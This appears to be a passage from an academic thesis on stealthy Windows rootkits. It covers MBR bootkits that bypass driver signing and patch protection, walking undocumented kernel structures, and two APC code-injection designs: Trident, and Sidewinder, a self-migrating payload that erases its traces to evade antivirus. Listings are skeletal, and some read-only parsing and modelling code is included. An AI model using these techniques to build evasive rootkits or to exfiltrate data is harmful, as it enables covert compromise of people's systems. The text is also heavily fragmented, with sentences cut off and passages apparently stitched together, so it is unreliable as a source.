functions in the context of a specific thread. This is useful for performing the covert
execution of code in innocuous or targeted applications. A thorough discussion of
TDL4
TDL4 has proven throughout the years to be one of the most advanced criminal
rootkits produced. The constant evolutionary cycles and use of rootkit techniques
at the frontier of their field have made it increasingly difficult to eradicate. This is
interesting to us for three reasons as presented in [57]:
• The use of a bootkit for controlling the start-up process of the system and
injecting the loader into the Windows kernel.
The APC injection attack employed in TDL4 is similar to the one developed inde-
pendently in our research, with a discussion presented in Chapter 3. The capabilities
where information such as the node IDs or files are stored as MD4 hashes. This makes
the network robust, able to restructure itself if any core nodes have their connections
severed, differing from client-server architectures in which a core node failure has
catastrophic consequences that behead the botnet. Any further discussion of the
C&C is outside the scope of our work.
ZeroAccess Rootkit
ZeroAccess, first discovered in late 2009, is another rootkit employing APC injection.
Also known by the aliases Max++ and Smiscer, this crimeware rootkit boasts sophis-
ticated functionality including modern persistent hooks, low-level API manipulation
for protecting hidden volumes, AV bypassing techniques, and the use of APCs to per-
form kernel-mode monitoring of all user-mode and kernel-mode processes and images
as well as injection into any processes or threads [58].
The ZeroAccess rootkit uses a similar method for APC injection as TDL4 and is
discussed in further detail in Chapter 3. The method used for the monitoring of user-
Magenta Rootkit
migration techniques to rapidly move around memory using APCs. This is based on
employing APCs to inject into a process or thread upon loading on the system, and
once the rootkit completes in the context of the particular process or thread it
continues the attack by propagating to a new context [60].
No evidence exists that this hypothetical rootkit has been implemented, and as such much
of the research presented in this paper builds on the ideas proposed in the Magenta
specifications. This is mainly in regard to the Sidewinder injection technique
presented in Chapter 3.
2.6 Veni, Vidi, Vici: Defeating Modern Protections
While APCs are shown throughout subsequent chapters to satisfy the requirements
outlined in Section 2.2 we must first consider how to gain control of the system and
As described in Section 2.3.5, MBR rootkits, also known as bootkits, are a power-
ful tool employed to alter the boot process of a target system. A modified boot
process guarantees that we control the entire start-up process, and can manipu-
late the OS loader and kernel during initialization. This is very useful for specific
purposes; namely bypassing new protection mechanisms added to the 64-bit line of
Windows-based OS. Throughout this section we will outline the execution paths of
MBR rootkits and the purposes for which they are employed.
Bootkit functionality allows a system to be hijacked prior to the loading of the
primary OS. This is achieved by loading the bootkit from the primary MBR and
persisting through the initial loading in real-mode, referred to as bootstrapping. The
bootkit must be able to persist through the transition from real-mode to protected
mode, at which point the primary OS is loaded and the bootkit is free to control
the initialization process. This enables the injection of any unsigned code into the
such as the base address of the processor control region or system thread table. This
technique has been shown to work across the range of NT-based kernels developed
from NT 5.0 onwards. A timeline of the Windows NT-family of OS is shown in Table
2.2. Bootkits have been documented across the entire range of NT 5.0 to 6.1 [61],
Windows 7, Windows Server 2008 R2    2009-10-22    6.1
Windows 8, Windows Server 8          2012-10-15    6.2
and can be modified to support any OS flavour, such as UNIX or BSD. Bootkits
have also been shown to be successful with pre-release candidates of the next version
of Windows—Windows 8 and Windows Server 8—based on the NT 6.2 kernel [62].
This makes them an ideal injection vector as they cover a comprehensive subset
of Windows, including future versions. As such, this provides an ideal method for
bootstrapping persistent code. We will discuss this technique throughout the rest of
The sophistication of this technique has been outlined in recent years by the
TDL4 malware; more specifically, in regards to its bootkit functionality as discussed
by Matrosov and Rodionov [63, 64]. It is one of the most advanced threats spreading
across the Internet, and the associated botnet has proven incredibly difficult to
dismantle, primarily due to the difficulty in removing it from infected systems without
completely destroying their MBRs. At its core is eEye’s BootRoot technology [53]
with constant modifications throughout each iterative version of the TDL framework.
At the heart of a bootkit is a modified MBR layout. The primary OS record is moved
to a different location and the original record is overwritten to redirect flow
through the bootkit loader. The active partition flag is set on the bootkit’s record
and cleared on the primary OS’s record. The new active partition is initialized
as the Volume Boot Record (VBR). By controlling the MBR and associated hard disk
layout the bootkit is free to allocate a hidden region at the end of the disk where
the malicious components can be stored. Following these modifications, the system
boots the new bootkit record and passes control to the VBR, allowing the bootkit to
control the OS loader’s initialization routine before it becomes resident in memory.
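Because these changes are visible in the on-disk layout, the classic MBR structure is worth making concrete from an inspection point of view. The following is a minimal read-only sketch that parses the four partition entries of a 512-byte MBR sector held in memory and counts the entries flagged active. The offsets follow the conventional MBR layout (partition table at byte 446, 16-byte entries, 0x55 0xAA signature at bytes 510 and 511); the type and function names are hypothetical, and the code neither reads from nor writes to a disk.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MBR_SIZE          512
#define MBR_TABLE_OFFSET  446
#define MBR_ENTRY_SIZE    16
#define MBR_ENTRY_COUNT   4
#define MBR_ACTIVE_FLAG   0x80

struct mbr_entry {
    uint8_t  status;       /* 0x80 = active (bootable), 0x00 = inactive */
    uint8_t  type;         /* partition type identifier */
    uint32_t first_lba;    /* first sector of the partition */
    uint32_t sector_count; /* length of the partition in sectors */
};

/* Read a little-endian 32-bit value from a byte buffer. */
static uint32_t read_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Parse the partition table; returns 0 on success, -1 on a bad signature. */
int mbr_parse(const uint8_t sector[MBR_SIZE],
              struct mbr_entry out[MBR_ENTRY_COUNT])
{
    assert(sector != NULL && out != NULL);
    if (sector[510] != 0x55 || sector[511] != 0xAA)
        return -1;
    for (size_t i = 0; i < MBR_ENTRY_COUNT; i++) {
        const uint8_t *e = sector + MBR_TABLE_OFFSET + i * MBR_ENTRY_SIZE;
        out[i].status       = e[0];
        out[i].type         = e[4];
        out[i].first_lba    = read_le32(e + 8);
        out[i].sector_count = read_le32(e + 12);
    }
    return 0;
}

/* Count entries flagged active; a conventional MBR has at most one. */
size_t mbr_active_count(const struct mbr_entry entries[MBR_ENTRY_COUNT])
{
    assert(entries != NULL);
    size_t n = 0;
    for (size_t i = 0; i < MBR_ENTRY_COUNT; i++)
        if (entries[i].status == MBR_ACTIVE_FLAG)
            n++;
    return n;
}
```

Comparing the parsed entries against a known-good copy is one plausible way to notice that the active flag has moved or that a previously unused entry has appeared, which are the kinds of change the paragraph above describes.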
The VBR loads the 16-bit real-address mode loader—the initial program that is
executed immediately after powering on—from the hidden partition and hooks the
BIOS interrupt 13h—the interrupt that performs sector-based disk R/W—in order
to patch the Boot Configuration Data (BCD) and OS [64] by manipulating R/W
accesses, and continuing to load the primary OS’s VBR in order to initialize the
target OS. This is depicted in Figure 2.2 with the different modules broken down in
Table 2.3.
[Figure 2.2 (flowchart; caption not recoverable). Labels: Load infected MBR; Load bootmgr with modified BCD; Execute OS loader; 32-bit; 64-bit: patch security routine to pass on image hash; Load bootmgr.]
With the boot process altered, and the bootkit controlling any further R/W access,
bootstrapping of the target OS begins. This process is illustrated in Figure 2.2. The
Windows bootmgr is loaded and executed, the BCD is read into memory along with
the Windows loader, winload.exe. The start-up options in winload.exe are altered
to stop the initialization of Windows from entering WinPE mode. If winload.exe is
allowed to enter WinPE mode then it utilizes the MININT flag that makes any changes
to the SYSTEM registry hive volatile, and therefore not persistent across restarts. The
start-up process continues with either a 32-bit or 64-bit loader—depending on the
architecture of the target system—injecting a specified malicious driver into the target
OS’s kernel-mode. Once the malicious driver is kernel-mode resident in the target OS
KMCS is a feature that was added to 64-bit versions of Windows that requires any
loaded kernel-mode software to be digitally signed with a Software Publishing Cer-
tificate (SPC) in order to be loaded into the OS kernel [65]. Another requirement for
KMCS is that any boot-loaded drivers must have their driver binary image signed
with an embedded key in order for the driver to be instantiated into the kernel during
boot [65]. KPP is another addition to 64-bit versions of Windows that protects the
kernel from unauthorized patching of the SSDT, IDT, GDT or any other part of the
kernel [66]. Signed code execution and patch protection against kernel-mode
modifications are not limited to Windows; various other OS utilize similar techniques
to deter malicious code execution. Bootkits enable the subversion of these
protection mechanisms through the altering of BCD data in order to change WinPE
booting, disabling of signed certificate checks and enabling of test signing, hijacking
of legitimate signed certificates, and patching the boot manager (bootmgr) and OS
exploited recently in the wild. This involves the employment of large-scale clusters
performing factoring attacks on cryptographically weak 512-bit RSA keys used in
digital certificates [68]. Once the key of a digital certificate has been factored, the
certificate can be used to sign any piece of code in order to satisfy the KMCS policies. This effectively
enables any driver to be signed with an authentic certificate belonging to a legitimate
corporation.
While there is no necessity to bypass KMCS and KPP, and we could sign our
driver and load it through the normal channels, this leads to a compromise of our
stealth. To that end, we have chosen to employ the MBR techniques described herein
signed code execution and patch guarding against kernel-mode alterations. Although
this technique has been previously deployed in the wild, it still proves a difficult
mechanism to identify, and especially challenging to remove. These factors make the
bootkit methodology an ideal first stage bootstrapping tool, aiding our developed
The internal data structures and operating mechanisms of Windows NT-based kernels
consist of a wide array of non-exported functionality and variables that can be used
for counter-intelligence operations. Non-exported functionality and variables are not
normally available to user-mode applications and kernel-mode extensions, and are
only accessible via Software Reverse Engineering (SRE) efforts. The remainder of
this section discusses our SRE effort to recover the internal structures of the Windows
kernel necessary to employ APCs. We also describe the techniques used to reverse
engineer these data structures.
The Windows NT kernel contains a large array of exported functions via API
layers for both user-mode (WIN32API) and kernel-mode (WINDDK) program imple-
mentations. This allows developers to develop applications or device drivers targeting
Windows without significant overhead. However, there are certain functions and vari-
ables that are omitted from these API packages. This is referred to as non-exported
functionality, and operates in this manner to hide low-level OS data structures from
malicious software; whether it be rootkits performing stealth activity or poorly im-
plemented programs that cause critical errors.
Non-exported functionality has been previously documented [69, 70, 71, 72], but
this work only went as far as to document a list of variables that are not exported
by the kernel and defined primitive methods to gain access to these variables. Recent
rootkits have used this in order to access the system thread table (the PspCidTable
on Windows, although this construct is not limited to Windows), a handle table containing
pointers to every process and thread residing on the machine. The most notable
rootkits employing this technique include FU and FUTo, previously discussed in Sec-
tion 2.3.2.
The version-specific approach to using this table requires a set of predefined memory
offsets to access and manipulate specific locations within the kernel. This is effective
if the version of the OS that is infected is covered by the predefined offsets. Otherwise
the rootkit will encounter a critical or fatal error that may in turn result in a system
failure.
Rather than performing direct memory accesses and manipulations, we have opted
to reverse engineer the internal data structures of the Windows NT kernel to increase
OS version coverage. This was performed using a variety of techniques, primarily in-
volving live kernel debugging sessions with WinDbg [73] and recreating the associated
regions as well as all important non-exported variables from the kernel debugger
structure; implemented in Windows as the KDDEBUGGER_DATA64 structure, as shown
Listing 2.1. The data structures used throughout this routine are documented in
Appendix A.
systems a KPCR structure exists for each of the cores residing at a dynamic location.
We acquire a pointer to the current KPCR structure—in a single- or multiprocessor
agnostic approach—via the KeGetKpcr function. Various techniques for acquiring the
dynamic address of the KPCR are possible. Once we have the KPCR location we
walk through the series of internal structures until we obtain a pointer to the ker-
nel debugger structure. This hooking mechanism via traversing the kernel’s internal
structures enables us to return a pointer to the system thread table in a generic way
that works across the entire family of Windows NT OS via SRE and the recreation
of the data structures documented in Appendix A. This can also be used to obtain
pointers to the other non-exported functionality and variables hidden within the ker-
nel debugger structure, documented in Appendix A.1.10, such as the loaded module
list (PsLoadedModuleList).
Comparatively, the FU and FUTo rootkits acquire the system thread table through
a convoluted process of scanning the PsLookupProcessByProcessId function to lo-
cate the push instruction that places the system thread table address onto the stack
[36]. This is a computationally expensive process, requiring real-time disassembly
and kernel-mode memory accesses that may trigger security protection mechanisms.
Listing 2.1: Hooking the kernel debugger structure (KDDEBUGGER_DATA64)
to access a non-exported variable; in this case the system thread table
(PspCidTable).
PKPCR NTAPI KeGetKpcr ( VOID )
{
PKPCR pKpcrAddr = NULL ;
SYSTEM_INFO siInfo ;
return ( pKpcrAddr ) ;
}
// Hook KPCR
pKpcr = KeGetKpcr () ;
return ( pHandleTable ) ;
}
Figure 2.3: Locating desired threads by walking the system thread table
(PspCidTable) on a Windows target. [Flowchart labels: Initialized; Ready; List entry; Get State, Alertable, and ApcQueueable members; Check thread; State: not ok / Alertable: false / ApcQueueable: false; State: ok & Alertable: true & ApcQueueable: true; Thread APC injectable; Complete.]
Once the system thread table is available we are free to traverse its contents and
access or manipulate any process or thread residing on the system. This is illustrated
in Figure 2.3 showing the methodology of acquiring suitable threads meeting our
in Chapter 3. This process begins by acquiring a pointer to the system thread table
(PspCidTable) via the kernel processor control region (KPCR). We traverse the list
entries in the system thread table while checking each of the thread entries against
our three criteria until a suitable candidate is located. On Windows we test the
criteria by comparing the values stored in the executive thread structure (pointed to
by our acquired handle) and the kernel APC structure—implemented as KAPC and
documented in Appendix A.1.6—that is a member of the executive thread structure.
This general concept applies to other OS as they have similar management structures
to keep track of processes and threads. We can also further our specificity by supplying
a target image name, such as services.exe, forcing injection into a desired target
process.
Utilizing this direct access to internal kernel information (shown in Figure 2.3) and
building on the previous techniques to traverse the Windows kernel to acquire pointers
to non-exported functionality and variables (shown in Listing 2.1), we are able to
our findings we focus on APCs, outlined briefly in Section 2.5, that allow the exe-
cution of code in both kernel-mode and user-mode in ways that satisfy the criteria
outlined in Section 2.2. We have also identified the capabilities of this technique
clude MBR bootstrapping (Section 2.6.1) as well as undocumented kernel data struc-
tures that exist throughout the entire dynasty of the Windows NT OS family and the
2.8 Summary
In this chapter we have outlined the history of rootkit techniques: user-mode, kernel-mode,
VMBR, SMBR, and MBR. Based on these techniques we use three criteria to
assess the effectiveness of a framework in support of counter-intelligence operations.
These include:
• Stealth Capability: The ability to remain hidden within the target OS.
• Semantic Gap: The richness of data types and structures as viewed within the
target OS.
• Data Exfiltration: The ability of the rootkit to communicate with the outside world.
Based on these criteria we have chosen to focus on kernel-mode (ring 0) as the target
privilege level for our counter-intelligence framework, thereby also enabling us to
into APCs. We also briefly presented previous work that has employed APCs with a
similar focus to our own in order to understand the capabilities APCs currently offer.
Supporting research was investigated regarding the Windows NT-based OS. This
supports both the persistence of our framework, through the use of MBR bootstrap-
ping, and hooking into undocumented functionality, through the reverse engineering
Chapter 3
This chapter begins by building on the summary presented in Section 2.5 with a
thorough overview of APCs. We present an example use case of APCs to better
understand their inner workings, and provide brief overviews of the various other tasks
APCs accomplish. This continues with an investigation of their internal structure and
operational requirements as defined by Probert [56, 74].
ter 4. Injection enables the insertion and execution of a payload in a process’ context
while masking the payload’s origin. Utilizing injection, we present two separate tech-
niques introduced by this research: Trident and Sidewinder. Trident involves the use
3.1 Overview
chronous callbacks, and the underlying kernel method to achieve this. These are
referred to as Asynchronous Procedure Calls (APC), allowing a thread to divert from
its original path and execute a piece of foreign code [75].
regular execution. Upon completion in kernel-mode, and once the user-mode thread
executes with a low Interrupt Request Level (IRQL) of 0 (PASSIVE) or 1 (APC),
the APC is delivered and the I/O operation completes providing the thread with the
result of the associated I/O operation [76]. The set of IRQLs supported by Windows
is listed in Table 3.1 with the associated IRQ name and type of each level. This shows
that APCs only execute when the processor is in a PASSIVE or APC IRQL.
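The delivery rule stated above reduces to a comparison on the current IRQL. The sketch below models it in portable C. The numeric values for PASSIVE and APC are those quoted in the text, and DISPATCH is taken as one level above APC, as the text describes for DPCs. The enum and function names are hypothetical stand-ins, not the WDK definitions.

```c
#include <assert.h>
#include <stdbool.h>

/* IRQL values as described in the text: PASSIVE = 0, APC = 1, DISPATCH = 2. */
enum toy_irql { TOY_PASSIVE = 0, TOY_APC = 1, TOY_DISPATCH = 2 };

/* Per the text, APCs only execute at the PASSIVE or APC IRQL. */
bool toy_apc_can_execute(int irql)
{
    assert(irql >= TOY_PASSIVE);
    return irql <= TOY_APC;
}

/* True when the processor is at DISPATCH or above, where APCs must wait. */
bool toy_dispatch_or_above(int irql)
{
    assert(irql >= TOY_PASSIVE);
    return irql >= TOY_DISPATCH;
}
```

The two predicates are complements of one another for any valid level, which is simply another way of stating that an APC waits until the processor drops below the DISPATCH IRQL.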
APCs are used extensively throughout the kernel to accomplish tasks and function-
creating and destroying processes and threads, as well as performing error reporting
[56]. This is by no means a complete list of their employment, but it does show the
• Special Kernel-Mode: This is a special form of APC that can preempt regular
kernel-mode APCs. This type of APC is used for OS-level tasks such as creating
or terminating processes or threads.
Looking at these different types, and the varying levels with which they are expected
to interact with user-mode and kernel-mode, it is apparent that APCs were designed
to complement Deferred Procedure Calls (DPC). DPCs are a mechanism by which the
OS can guarantee that a routine will be executed on a specific processor. They operate
one IRQL higher than APCs, as dictated in Table 3.1 at the DISPATCH IRQL. DPCs
are queued by an Interrupt Service Routine (ISR), where the work is deferred to the
DPC routine to perform the task [56]. This implies that a pending DPC will suspend
execution of the preempted thread until the DPC completes, differing from APCs
where execution is allowed to continue until the issued interrupt returns, suspending
thread execution.
The interactions between APCs and DPCs are shown in Figure 3.1 from [56].
This outlines the process through which the OS kernel performs thread scheduling,
an important methodology for our later considerations of how APCs can be used as
an attack vector in the Windows kernel.
associated threads. By tracking the state graph, and referring back to the purposes
APCs and DPCs serve throughout the OS, it becomes clear that they are not only
to perform a wide range of process and thread activity; including KeInitThread and
KeTerminateThread that both employ APCs for thread creation and deletion.
This also provides us with insight into what state a thread must currently be
operating at in order to inject an APC into the queue. It is important to identify the
semantics of thread states, which include the following states as described in [77]:
• Ready: The state of a thread waiting to execute after being tasked to a particular
processor or swapped back into memory after a context switch.
• Running: The state of a thread once a context switch is performed and execution
begins.
• Terminated : Once a thread finishes execution it enters this state and waits for
the dispatcher to destroy it.
• Waiting: The state entered when it either voluntarily waits for an object to
synchronize or the OS must wait for the requested action to complete (such as
I/O paging).
• Transition: The state of thread that is ready for execution but its associated
stack is paged out of memory.
• Deferred Ready: When a thread has been tasked to run on a specific processor
but has not yet been scheduled.
• Gate Waiting: When a thread is waiting for a gate dispatcher object to be ready.
This state is not shown in Figure 3.1 as the diagram is specific to earlier NT-
If a thread is currently in a proper alertable wait state then an APC will fire im-
mediately. Alternatively, if the thread is in the ready or running state the APC will
be queued to run the next time the thread is scheduled to execute. A problem exists
when a thread is in a specific state in which the processor is operating at the DIS-
PATCH IRQL, in which case an APC will be preempted. Looking at the transitions
we see that avoiding the APC preemption paths that may trigger this problem due to
issued DPCs—requiring the processor to execute at an elevated DISPATCH IRQL—
requires the avoidance of the deferred ready state. Thus, we only want to fire an APC
into the target thread after a KiRetireDpcList, KiSwapThread, KiExitDispatcher,
KiProcessDeferredReadyList or KiDeferredReadyThread call. At this point the
processor’s current IRQL is lowered, dropping below the DISPATCH IRQL and en-
abling APC or PASSIVE IRQL execution to continue [56].
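The state-dependent behaviour described above can be summarised as a small decision function. This is a toy model of the prose only: the enumerations and the function name are hypothetical, the states are limited to those listed in the text, and any combination the text does not discuss (for example a non-alertable wait, or the terminated and transition states) is reported as not discussed rather than guessed.

```c
#include <assert.h>
#include <stdbool.h>

/* Thread states as listed in the text (after [77]). */
enum toy_thread_state {
    TOY_READY,
    TOY_RUNNING,
    TOY_TERMINATED,
    TOY_WAITING,
    TOY_TRANSITION,
    TOY_DEFERRED_READY,
    TOY_GATE_WAITING
};

/* What the text says happens to an APC aimed at a thread in that state. */
enum toy_apc_disposition {
    TOY_FIRES_IMMEDIATELY,       /* alertable wait state */
    TOY_QUEUED_UNTIL_SCHEDULED,  /* ready or running */
    TOY_MAY_BE_PREEMPTED,        /* deferred ready, DISPATCH IRQL in play */
    TOY_NOT_DISCUSSED            /* the text makes no statement */
};

enum toy_apc_disposition toy_classify(enum toy_thread_state state,
                                      bool alertable)
{
    assert((int)state >= (int)TOY_READY &&
           (int)state <= (int)TOY_GATE_WAITING);
    switch (state) {
    case TOY_WAITING:
        return alertable ? TOY_FIRES_IMMEDIATELY : TOY_NOT_DISCUSSED;
    case TOY_READY:
    case TOY_RUNNING:
        return TOY_QUEUED_UNTIL_SCHEDULED;
    case TOY_DEFERRED_READY:
        return TOY_MAY_BE_PREEMPTED;
    default:
        return TOY_NOT_DISCUSSED;
    }
}
```

Keeping an explicit "not discussed" outcome avoids attributing behaviour to the scheduler that the cited sources do not state.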
From Figure 3.1 we also infer the associated traits of a thread required to support
APCs, as outlined by MSDN [78, 1], describing the conditions that must be met for
each type of APC to properly work. These conditions are shown in Table 3.2. The
boolean conditions Alertable and WaitMode are passed to KeWaitForSingleObject,
KeWaitForMultipleObjects, KeWaitForMutexObject, or KeDelayExecutionThread
affecting the behavior of the associated waiting thread [1]. The Alertable value
defines whether the thread can be alerted in order to abort a wait state.
Once the proper conditions have been met we begin by initializing a kernel APC
object (KAPC), outlined in Appendix A.1.6, describing the APC environment. A kernel
APC object outlines every detail relating to the APC, from a kernel thread structure
detailing the associated target thread, to the associated APC routines and operating
mode. We continue with a full dissection of the kernel APC object.
Appendix A.1.6 contains the Type and Size members used internally by the ker-
nel, an executive kernel thread structure (KTHREAD) pointing to the associated target
thread, the routines to be executed throughout the APC’s lifetime, the ApcStateIndex
that uses one of the environments defined by the enumeration listed in Listing 3.1,
the NormalContext that is set based on the ApcMode and the routines that are
Table 3.2: Asynchronous Procedure Call Operational Conditions (adapted from [1])
set to non-null values, the ApcMode which defines the mode of operation as either
KernelMode or UserMode, and a value indicating whether the APC has been Inserted
or not. There are three routines that can be associated with the kernel APC object:
KernelRoutine, RundownRoutine and NormalRoutine. The routines define specific
behaviour associated with the APC; the KernelRoutine is required and defines the
first function the driver will execute upon successful delivery and execution of the
APC, the NormalRoutine function can define either a user-mode APC or regular
cial kernel-mode, and lastly RundownRoutine can be used optionally which defines a
kernel-mode component that is only called if the APC queue is discarded in which
case neither the associated KernelRoutine nor NormalRoutine is executed. This is
to KeInsertQueueApc, also prototyped in Listing 3.1, is made that adds the APC
to the target thread’s queue. The prototypes outlined in Listing 3.1 draw from the
Based on this dissection of APCs, and the various associated structures and func-
tions, we present an example to illustrate their mechanics in Listing 3.2. In this ex-
ample we have the function ApcFireThread that inserts a special kernel-mode APC
into the queue of a target thread. We begin by initializing the kernel APC object with
the APC environment, our three operational routines, the ApcMode (in this case
Listing 3.1: Undocumented Windows NT DDK kernel APC function prototypes and
structures.
typedef enum _KAPC_ENVIRONMENT
{
    OriginalApcEnvironment,
    AttachedApcEnvironment,
    CurrentApcEnvironment
} KAPC_ENVIRONMENT;
NTKERNELAPI BOOLEAN KeInsertQueueApc(
    IN PRKAPC Apc,
    IN PVOID SystemArgument1,
    IN PVOID SystemArgument2,
    IN KPRIORITY Increment
);
KernelMode), and the NormalContext. In this case we have neglected to set two of
our routines, the RundownRoutine and NormalRoutine, leaving them as null for sim-
along our kernel APC object, any appropriate parameters, and the APC completion
event we previously initialized. At this point the APC has been queued in the target
thread’s context and is scheduled for execution when the processor associated with
the target thread drops below the DISPATCH IRQL (to APC or PASSIVE).
The discussed capabilities of APCs in this section have outlined their various
Listing 3.2: Example queuing of an APC into a target thread’s context illustrating
KeInitializeApc and KeInsertQueueApc.
void A p c K e r n e l R o u t i n e ( PKAPC pkApc ,
P K N O R M A L _ R O U T I N E NormalRoutine ,
PVOID NormalContext ,
PVOID SystemArgument1 ,
PVOID SystemArgument2 )
{
// P l a c e h o l d e r for K e r n e l M o d e APC routine that e x e c u t e s
// in the target thread ’s context ( address space )
}
// ...
// ...
// I n i t i a l i z e event
K e I n i t i a l i z e E v e n t ( pkApcCompletionEvent , // APC c o m p l e t i o n event
NormalEvent , // Event type
FALSE ) ; // Initial state
// ...
// ...
return (0) ;
}
strengths. This includes their ability to execute code across the entire OS, from user-
mode to kernel-mode, while masking the origin of the executed payload. They also
find pervasive deployment throughout the OS, appearing innocuous and therefore
difficult to detect. Finally, they execute in the APC IRQL, and although they don’t
receive immediate attention, the incurred delays are minimal as they execute above
the normal PASSIVE IRQL. These factors make them an ideal target to provide
stealth code execution while still allowing any payload to be executed, whether it be
an intrusion detection tool to investigate malicious activity or a covert communication
This section discusses operational techniques that we have developed exploiting APCs.
The techniques utilize our blueprint as previously outlined in the last section. The
3.2.1 Injection
or thread and performing code execution within that process or thread’s context.
This masks the origin of the payload, allows the execution of code in the target’s
privilege level, and enables the payload to appear benign as we can specifically target
processes and threads that perform similar functionality, such as performing network
communications over a secure HTTP connection within a web browser’s context. This
subsection outlines how injection attacks utilizing APCs work, presenting a complete
overview of their workings.
[78]:
• Windows API : Various functions exist within the Windows API allowing injec-
process.
Also briefly outlined by Butler and Kendall [78] is the potential use of APCs for the
purpose of injection into a target process or thread. As discussed in this work, APCs
are a unique frontier with no current AV being capable of detecting their use. Any
process or thread on the system is a potential target, thereby providing an extensive
attack surface.
Although we have shown the employment of APCs in both public and private sector
malware, there exists no full analysis or implementation of them in the context in
which we are interested. This subsection intends to present such an outline, discussing the
mechanics of injection attacks at a high-level, enabling an implementation in the next
chapter.
The injection technique does have a set of obstacles that must be tackled in order
or Position Independent Executable (PIE) is used. This subsection will continue with
an outline of the steps involved in APC injection while providing methods to overcome
[Figure 3.2: State diagram of the APC injection process, running from Start through
thread acquisition, payload loading and adjustment, MDL allocation and testing, page
locking, attachment to the target process, and payload injection to Complete.]
loaded kernel32.dll and ntdll.dll libraries, all the while being alertable. This
process is illustrated in Figure 2.3 from Section 2.6.2 employing the system thread
ory and create a Memory Descriptor List (MDL), a structure defining a buffer de-
scribed by a set of physical addresses [79]. Once the allocated region has been ver-
ified the virtual address pages describing the MDL are made resident in memory
and locked with MmProbeAndLockPages. Next, the target process is hijacked with
dress space. Once the payload is in place, control of the target is released with
KeDetachProcess or KeUnstackDetachProcess and the APC is initialized with
KeInitializeApc and queued for delivery with KeInsertQueueApc, at which point the
control flow of the target process executes
the inserted code. This process is outlined in Figure 3.2 showing the function transi-
tions with the associated states. The implementation of this is discussed in the next
chapter.
This technique enables us to directly execute a sequence of instructions within
the context of another process, appearing as if the process is the owner of the code
and masking the payload’s origin. This allows us to execute code in any process’
context on the target system, making it viable to act as a veil of the true intent of
the payload. In this way we can hide the execution of our code in a stealthy manner
while maintaining a close proximity to our target, thereby avoiding any semantic gap
problem, and perform any desirable tasking, such as data exfiltration over a covert
HTTP channel executing within a web browser’s context. This technique thereby
With APC injection explained we are free to consider different methods of covertly
executing code via injection. In this section we investigate two methods of injection
via APCs: kernel-mode to user-mode injection and user-mode to user-mode injection.
The first involves a persistent kernel-mode driver being used as both the jumping off
point for injections as well as for callbacks after the targeted user-mode processes have
completed execution of the injected payloads. This is the primary method employed
and-forget strategy. Once the initial driver has injected the inaugural payload into a
user-mode process the driver is unloaded from kernel-mode. The payload executes its
primary tasking and initiates a new injection via a user-mode to user-mode mechanism
into a different process. After the APC has been queued in the new process, with the
callback function set to the payload itself, the allocated memory segment is destroyed,
This involves the loading of a primary system driver that is used for sanity monitoring
as well as launching all subsequent payloads used in the investigation. This method
mode mirrors the early command guided systems of Trident missiles, and as such
this technique has been dubbed Trident as an homage. The Trident missile is com-
posed of a ballistic missile with Multiple Independently-targetable Reentry Vehicles
(MIRV) as the payload [80]. After attaining a low altitude orbit, the guidance sys-
tem performs a final trajectory update using calibrations based on star coordinates
to aid the inertial guidance system, after which the MIRVs are deployed with their
individual trajectories aimed at multiple targets. This definition is reminiscent of
The Trident technique is illustrated in Figure 3.3. The process begins once the
loader completes the bootstrapping process and the driver is initialized via Driver-
Entry. After the driver is kernel-mode resident it executes the primary tasking that
defines the payloads to be injected and any restrictions that must be considered,
such as process privilege level or loaded drivers. Once suitable candidates are ac-
quired the driver begins injecting payloads into the target processes via APCs, which
can define either a user-mode or kernel-mode APC by setting the ApcMode via the
NormalRoutine. As a safety mechanism we also employ the RundownRoutine in the
case of the APC being discarded from the target process’ queue. In this way all in-
jected payloads execute concurrently in their host processes. Once all payloads have
been injected the driver sleeps, waiting for callbacks from the payloads in the Wait
state. Depending on the results returned and the assigned primary tasking the driver
either unloads via DriverUnload or continues the injection process.
[Figure 3.3: Trident technique for injecting sequentially or concurrently into multiple
processes while maintaining persistent control from kernel-mode. Diagram steps: load
driver, initialize core routine and primary tasking, inject payloads via APC, execute
KernelRoutine or RundownRoutine, driver callback, unload driver.]
each of the tines represents an independent payload injected into a unique process
is called thereby returning control to the primary driver. This allows results from the
inject to be analyzed and further injection or exfiltration of the results performed.
moving target [81]. This terminology draws from the Crotalus cerastes, a venomous pit
viper species, bearing a fitting description for our fire-and-forget injection technique.
The Sidewinder technique has only been speculated about in prior text, vis-à-vis
Magenta as discussed in Section 2.5.2. In this subsection we intend to provide a high-level
overview of how such a mechanism is possible, paving the way for an implementation
in the next chapter.
Rapidly moving through the system provides direct access to the OS while main-
taining a minimal footprint. Although code is constantly being executed, it is always
in the context of a varying set of processes or threads and never remains in any
location for an extended period of time. This makes the locating and analysis of
code employing this technique extremely difficult, and bypasses common AV tech-
[Figure 3.4: Sidewinder technique for injecting autonomous payload that continues
migration through unique system processes. Diagram steps: load driver, initialize core
routine and primary tasking, inject payload from kernel-mode into a user-mode process
via APC, driver callback, unload driver, then inject the autonomous payload into the
next user-mode process via APC (Process 1, Process 2, ..., Process N).]
technique in order to make the driver kernel-mode resident using the loader to boot-
strap the driver and execute DriverEntry. The Core tasking is executed that lo-
cates a target process, as in Trident, and initiates the injection. The driver injects
the payload into the target process using a user-mode APC. To bypass detection
methods using PsSetLoadImageNotifyRoutine the driver exits prematurely without
returning true, although the figure shows a configuration that properly unloads with
DriverUnload for completeness. The payload is fully autonomous and upon complet-
ing its tasking in the target process it locates a new target process, injects into it using
an appropriate user-mode injection mechanism and exits from the local process. This
mechanism is free to continue until the embedded tasking orders it to complete or the
machine halts. Upon the machine restarting the bootstrapping loader reinitializes
the process.
The actual injection sequence between user-mode threads, once the initial driver
has exited and the first thread has executed the payload, is shown in Figure 3.5. This
shows the process through which the tasking payload is executed, the proper libraries
get loaded with GetProcAddress and LoadLibrary, a new thread is selected and acquired,
and the APC is allocated and injected into the new thread with QueueUserAPC.
Once this is accomplished the current thread’s memory is destroyed to remove trace
evidence. This completes the self-replicating process through which the user-mode
3.3 Summary
port everything from I/O and timing to thread creation and termination. Through
the dissection of their internal constructs we now understand their various operating
modes (user-mode, kernel-mode and special kernel-mode) and the requirements
associated with each mode in order for APC firing to occur in a target process or
thread.
[Figure 3.5: Autonomous payload injected with Sidewinder for rapid migration between
user-mode processes and threads. Diagram steps: init, tasking complete, get head of
thread table, target acquired, payload injected, add APC to queue to execute when IRQL
next equals PASSIVE or APC, APC queued, delete payload memory in local process,
